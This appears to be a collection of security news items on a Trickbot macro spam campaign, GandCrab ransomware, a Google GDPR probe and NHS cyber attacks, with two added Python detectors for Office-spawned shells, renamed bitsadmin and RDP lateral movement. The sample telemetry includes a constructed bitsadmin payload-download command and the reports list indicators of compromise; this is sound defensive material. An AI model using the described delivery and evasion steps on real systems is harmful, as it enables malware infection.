Trickbot distributed in new spoofed ‘complaint’ emails

  • The spam emails tried to mimic Dun & Bradstreet’s official site by having a lookalike, fake domain.
  • These emails contained macros that drop malicious BAT files to initiate the download for Trickbot’s payload.

Trickbot, one of the most persistent banking trojans currently active, has been spotted in yet another spam campaign. This time the attackers have impersonated Dun & Bradstreet, the prominent business analytics company.

Spam emails posing as a ‘complaint’ carry Word attachments whose malicious macros deliver Trickbot. The campaign is reported to have been directed at recipients in the US.

The big picture

  • The emails have the subject line “FW: Company Complaint #DNBC920201TF” and are sent from the spoofed address service@dnscomplaint[.]com.
  • They carry a Word document attachment named ‘DNBC920201TF.doc’, which contains the malicious macros.
  • The macros run once the attachment is opened and macro content is enabled. They drop several BAT files onto the system; these contain the instructions to download and install Trickbot.
  • The macro then copies bitsadmin.exe, the legitimate Windows command-line tool for managing Background Intelligent Transfer Service (BITS) download jobs, and renames the copy ld0CIC0.exe. Renaming a built-in system binary is intended to evade security software that watches for bitsadmin.exe by name.
  • The renamed copy, ld0CIC0.exe, then downloads an EXE along with additional binary files, which are combined on disk to form the Trickbot payload.
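The delivery chain in the bullets above (a Word macro spawns a shell that drops BAT files, then a renamed copy of bitsadmin.exe fetches the payload) leaves a recognisable trail in process-creation telemetry. The following Python is an added example, not code from the original report: it runs two checks over a handful of constructed Sysmon-style Event ID 1 records. A renamed copy of a system binary still carries its original name in its PE version resource, which Sysmon exposes as the OriginalFileName field, so comparing that field with the on-disk name catches the copy whatever it was renamed to. The field names, the watchlists, the sample paths and the sample command lines are assumptions for illustration.

```python
"""Flag the Trickbot-style delivery chain in Sysmon process-creation events.

Added example. The events below are constructed for illustration; they are
not captured telemetry from the campaign described on the page.
"""
from __future__ import annotations

from dataclasses import dataclass

# Office hosts that should almost never spawn a shell or script interpreter.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe"}
# System binaries whose renamed copies are suspicious in their own right (assumed watchlist).
WATCHED_ORIGINALS = {"bitsadmin.exe", "certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}


@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 fields (field names assumed)."""
    image: str               # full path of the new process
    original_file_name: str  # OriginalFileName from the PE version resource
    parent_image: str        # full path of the parent process
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(event: ProcEvent) -> list[str]:
    """Return the list of detection labels that fire for one event (empty if benign)."""
    findings: list[str] = []
    img = basename(event.image)
    parent = basename(event.parent_image)
    orig = event.original_file_name.lower()
    cmd = event.command_line.lower()

    # Check 1: an Office application spawning a shell or script host.
    if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
        findings.append(f"office-spawned-script-host:{parent}->{img}")

    # Check 2: the PE says it is a watched system tool but it runs under another name.
    if orig in WATCHED_ORIGINALS and orig != img:
        findings.append(f"renamed-system-binary:{img} is {orig}")

    # Check 3: a BITS transfer job pulling from a URL, whatever the binary is called.
    if orig == "bitsadmin.exe" and "/transfer" in cmd and "http" in cmd:
        findings.append("bits-download-job")
    return findings


def triage(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (image, findings) for every event that fired at least one check."""
    return [(e.image, f) for e in events if (f := analyse(e))]


# Constructed sample telemetry: one benign Office launch, the two suspicious
# steps of the chain, and one legitimate administrative use of bitsadmin.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WinWord.exe",
              r"C:\Windows\explorer.exe", r'"WINWORD.EXE" DNBC920201TF.doc'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", "Cmd.Exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"cmd.exe /c C:\Users\victim\AppData\Local\Temp\stage1.bat"),
    ProcEvent(r"C:\Users\victim\AppData\Local\Temp\ld0CIC0.exe", "bitsadmin.exe",
              r"C:\Windows\System32\cmd.exe",
              r"ld0CIC0.exe /transfer job1 /download /priority foreground "
              r"http://example.invalid/payload.bin C:\Users\victim\AppData\Local\Temp\payload.bin"),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe",
              r"C:\Windows\System32\cmd.exe", "bitsadmin /list /allusers"),
]

if __name__ == "__main__":
    for image, findings in triage(SAMPLE_EVENTS):
        print(image, "->", ", ".join(findings))
```

Two caveats a practitioner would add: an attacker who also patches the version resource defeats the OriginalFileName comparison, so the Office-parent rule is the more robust of the two; and in production the child-process set should be derived from an allow-list of what Office legitimately spawns in the environment rather than a hard-coded list.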

Domains registered with GoDaddy – The domains used by this campaign’s emails were also observed to be registered through GoDaddy.

“Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar. Because of new GDPR rules, we cannot easily find the registrant’s name or any further details. Hosted on & sending emails via 95.211.143[.]199 | 185.203.33[.]172 | 95.211.197[.]182 | 85.17.76[.]82,” the report said.

What can be done to prevent the infection?

Users are advised to keep macros disabled so that they cannot run automatically when a Word document is opened. Recent versions of Microsoft Word disable macros by default and require the user to click through a warning before any macro runs.

Furthermore, any Word file received by email should be opened in Protected View, a read-only sandbox that prevents active content such as macros and DDE fields from executing on the system.

Ransomware warning: The gang behind this virulent malware just changed tactics again

Researchers say that those behind GandCrab ransomware are now going ‘big game hunting’ for larger targets – and more money.

The gang behind a family of ransomware that has been active for well over a year has tweaked its tactics to make the file-locking malware campaign as effective as possible.

GandCrab first emerged in January 2018 and has remained one of the most successful forms of ransomware ever since, with those behind it regularly releasing new versions to counter free decryption tools developed by security researchers.

The newest version of the ransomware — GandCrab 5.2 — was released in February and came just a day before the latest decryptor was released.

Now researchers at Crowdstrike have detailed some of the latest tactics the outfit behind GandCrab — which they refer to as Pinchy Spider — is deploying, signifying something of a shift in its targeting and deployment, with those behind it increasingly looking to compromise larger targets for a bigger payday.

GandCrab operates an affiliate model, with its authors providing the ransomware “as-a-service” to wannabe hackers in exchange for a 30 to 40 percent cut of the profits.

But now researchers have observed adverts for GandCrab being posted on underground forums, specifically aimed at criminals with skills in Remote Desktop Protocol (RDP) and Virtual Network Computing (VNC) access and experience of infiltrating corporate networks.

Using RDP and stolen credentials, attackers can lay the groundwork for a much larger attack, quietly using their access to move laterally through the network and stage GandCrab on many hosts before triggering the encryption.

Rather than a handful of machines being encrypted, attackers can then compromise entire networks, which they exploit to demand larger ransom payments in exchange for restoring the systems. Crowdstrike refers to this kind of attack technique as “big game hunting”.
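The pattern described above, one set of stolen credentials used over RDP to reach host after host before the ransomware is triggered, is visible in Windows Security logs before any encryption starts. The following Python is an added example, not code from Crowdstrike or the article: it parses a constructed export of successful logon records (Event ID 4624; LogonType 10 is the RemoteInteractive type used by RDP) and flags any account-and-source pair that reaches more than a threshold number of distinct hosts inside a sliding time window. The export format, the threshold and the sample records are assumptions for illustration.

```python
"""Flag one account fanning out over RDP to many hosts in a short window.

Added example. Event ID 4624 and LogonType 10 are real Windows Security log
values; the pipe-delimited export format and the records below are constructed.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Logon:
    when: datetime
    account: str
    source_ip: str
    target_host: str


def parse_export(lines: list[str]) -> list[Logon]:
    """Parse lines of 'timestamp|EventID|LogonType|TargetUserName|IpAddress|Computer'.

    Keeps only successful (4624) RemoteInteractive (LogonType 10) logons, i.e. RDP.
    Failed logons (4625) and network logons (LogonType 3) are deliberately ignored.
    """
    logons = []
    for line in lines:
        when, event_id, logon_type, user, ip, host = line.strip().split("|")
        if event_id == "4624" and logon_type == "10":
            logons.append(Logon(datetime.fromisoformat(when), user.lower(), ip, host.upper()))
    return logons


def rdp_fan_out(logons: list[Logon], max_hosts: int = 3,
                window: timedelta = timedelta(minutes=30)) -> dict[tuple[str, str], list[str]]:
    """Return {(account, source_ip): hosts} for each actor that touched more than
    max_hosts distinct hosts within any window-sized span of its logons.

    The hosts reported are those seen when the threshold was first crossed.
    """
    by_actor: dict[tuple[str, str], list[Logon]] = defaultdict(list)
    for logon in sorted(logons, key=lambda x: x.when):
        by_actor[(logon.account, logon.source_ip)].append(logon)

    alerts: dict[tuple[str, str], list[str]] = {}
    for actor, seq in by_actor.items():
        start = 0
        for end in range(len(seq)):
            # Slide the window start forward until it fits inside `window`.
            while seq[end].when - seq[start].when > window:
                start += 1
            hosts = {x.target_host for x in seq[start:end + 1]}
            if len(hosts) > max_hosts:
                alerts[actor] = sorted(hosts)
                break
    return alerts


# Constructed sample export: a service account sweeping five servers in eleven
# minutes overnight, a helpdesk user on two hosts, and two records that must be ignored.
SAMPLE_EXPORT = [
    "2019-03-01T02:14:07|4624|10|svc_backup|10.0.0.57|FS01",
    "2019-03-01T02:16:31|4624|10|svc_backup|10.0.0.57|FS02",
    "2019-03-01T02:19:02|4624|10|svc_backup|10.0.0.57|DC01",
    "2019-03-01T02:22:45|4624|10|svc_backup|10.0.0.57|APP01",
    "2019-03-01T02:25:10|4624|10|svc_backup|10.0.0.57|SQL01",
    "2019-03-01T09:01:00|4624|10|jsmith|10.0.0.21|FS01",
    "2019-03-01T09:20:00|4624|10|jsmith|10.0.0.21|APP01",
    "2019-03-01T09:25:00|4624|3|svc_backup|10.0.0.57|PRN01",   # network logon, not RDP
    "2019-03-01T09:25:30|4625|10|svc_backup|10.0.0.57|FS03",   # failed logon, ignored
]

if __name__ == "__main__":
    for (account, ip), hosts in rdp_fan_out(parse_export(SAMPLE_EXPORT)).items():
        print(f"{account} from {ip} reached {len(hosts)} hosts over RDP: {', '.join(hosts)}")
```

The threshold and window need tuning per environment: jump hosts and backup or monitoring accounts legitimately touch many machines, so the realistic deployment keys the rule on accounts or source addresses that are not expected to do so, and treats a first-time pairing of account and source as an additional signal.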

However, what differentiates the GandCrab gang from others who use this model is how they monetise the attack. Other ransomware groups, such as those behind SamSam, demand a single lump-sum payment. With GandCrab, even network-wide attacks demand payment on a per-PC basis.

No matter how the attackers collect the illicit funds, the campaigns continue to be successful, as organisations give into ransom demands.

“Running successful big game hunting operations results in a higher average profit per victim, allowing adversaries like PINCHY SPIDER and their partners to increase their criminal revenue quickly,” wrote Crowdstrike researchers, who have also shared indicators of compromise for GandCrab on the blog.

“Spammers, working with landing pages and corporate networking specialists — do not miss your ticket to a better life. We are waiting for you,” reads a translation of the advert.

New GandCrab v5.1 ransomware comes with new exploit kit distribution and TOR site features

  • The ransomware’s TOR site comes with a hidden private chat that can be enabled using one of the discount codes.
  • This allows dishonest data recovery firms to hide the final cost of the GandCrab decryption process from its customers.

It was only a few months ago that free decryption tools were made available for GandCrab versions 5.0 to 5.0.3. Within 24 hours of the release of those tools, the developers of GandCrab responded with a new version, GandCrab v5.1.

According to an extensive report from Coveware, the latest version of the ransomware comes with a variety of distribution changes and UX updates to the GandCrab TOR sites.

Multiple attack vectors and distribution techniques

Highlighting the attack vectors of the ransomware, the researchers said, “The primary attack vector for ransomware remains RDP ports, but GandCrab has a diverse array of distribution methods. While RDP-based ransomware attacks remain popular, automated attacks using exploit kits such as Fallout EK, Emotet, or credential stealers like Vidar have been linked to GandCrab infections as well.”

Alongside the wide use of these broadly available toolkits, the average GandCrab ransom demand has also increased.

Hidden private chat

The ransomware’s TOR site comes with a hidden private chat that can be enabled using one of the discount codes. This allows dishonest data recovery firms to hide the final cost of the GandCrab decryption process from its customers, along with their chats with the GandCrab support.

The discount code can be requested over chat. However, it can only be activated on the systems of targeted users.

“After entering the code, the applicable discount is displayed and the USD ransom amount on the payment pages is automatically adjusted. Discounts range from 5-20% depending on the size of the ransom,” the Coveware researchers added.

The payment process for GandCrab v5.1 remains the same. Here, the affected users are required to pay the ransom in Dash rather than in Bitcoin. “The wallet address for each page is unique and is rigged to trigger an updated screen on the TOR site once the correct amount of coins hits the wallet,” the researchers explained.

The UK grills Google for potential data privacy violations

  • Google is under investigation by the UK’s Information Commissioner’s Office (ICO) over alleged failures to comply with GDPR.
  • Google may face fines as large as $4 billion if the violation is proven.

After France fined Google and Sweden challenged it over data privacy, the UK’s data regulator, the Information Commissioner’s Office (ICO), is now investigating the tech giant over another alleged breach of GDPR.

Earlier, France fined Google $57 million, and Sweden asked the company to furnish more information about its privacy policy on location data.

The ICO is now cooperating with other European regulators to investigate Google’s data privacy practices in more depth.

“This is mainly due to people becoming more informed about their rights and exercising them, which has generated greater engagement as organizations turn to us for advice. Google is an organization that offers products and services to a large number of individuals both in the UK and worldwide. We have received complaints regarding Google which are being reviewed,” said a spokesperson for ICO.

Continued troubles

Google’s privacy troubles under GDPR continue despite the company’s stated commitment to the regulation’s guidelines. The UK investigation comes ahead of fourth-quarter financial results for Google’s parent company, Alphabet.

Last year, the tech giant was fined a record $5 billion in Europe for unfairly promoting its apps on the Android operating system. In 2017, it was fined $2.7 billion in Europe for manipulating search results to unfairly promote its own services.

Cyber Security Predictions: 2019 and Beyond

As you think about how to prepare your defences in advance of a new year of cyber threats, here are the trends and activities most likely to affect your organization.

In anticipating the major cyber security and privacy trends for the coming year, you can find plenty of clues in the events of the past 12 months. Among the now familiar forms of attack, breaches of major corporate systems and websites continued in 2018 and will inevitably be part of the 2019 cyber security scene. Many well-known organizations around the world suffered significant breaches this year. The single largest potential data leak, affecting marketing and data aggregation firm Exactis, involved the exposure of a database that contained nearly 340 million personal information records.

Beyond all-too-common corporate attacks, 2018 saw accelerated threat activity across a diverse range of targets and victims. In the social networking realm, Facebook estimated that hackers stole user information from nearly 30 million people. A growing assortment of nation-states used cyber probes and attacks to access everything from corporate secrets to sensitive government and infrastructure systems. At the personal level, a breach into Under Armour’s MyFitnessPal health tracker accounts resulted in the theft of private data from an estimated 150 million people.

So, what can we expect on the cyber security front in the coming year? Here are some of the trends and activities most likely to affect organizations, governments, and individuals in 2019 and beyond.

Cumbria health trust hit by 147 cyber attacks in five years

Of the attacks recorded against the county’s public bodies, 147 were directed at University Hospitals of Morecambe Bay NHS Trust (UHMBT), which runs hospitals in Barrow, Kendal, Morecambe and Lancaster.

The trust said it had spent £29,600 in 2017 dealing with the effects of cyber attacks.

The “vast majority” were “untargeted and unsuccessful”, it said.

Lee Coward, the trust’s head of information technology, said its “very rigorous reporting” process meant it was possible it had reported “higher volumes of identified cyber ‘attacks’ than other organisations”.

“We spend a lot of time and resources on ensuring our IT systems are safe,” he continued.

University of Cumbria senior lecturer in policing and criminology Iain Stainton said the number of attacks on UHMBT was “extraordinary”.

The National Cyber Security Centre average was 10 per week across the UK, he said.

‘Extraordinary’ attacks

A Freedom of Information (FOI) request by BBC News found the rest of the county’s councils and NHS trusts were, by comparison, targeted 14 times in total between 2014 and 2018.

Emergency patients had to be transferred from Whitehaven to Carlisle in 2017 because hackers demanding ransom money had locked NHS staff out of computer systems.

Copeland Borough Council spent £2m recovering from an attack later the same year, it said.

Independent elected mayor Mike Starkie said the effect on the council had been “devastating”.

“And it wasn’t recognised either,” he said.

“We had 60 anti-virus systems running and only three of those actually detected that there was anything in the system.

“None of them picked up actually what it was.”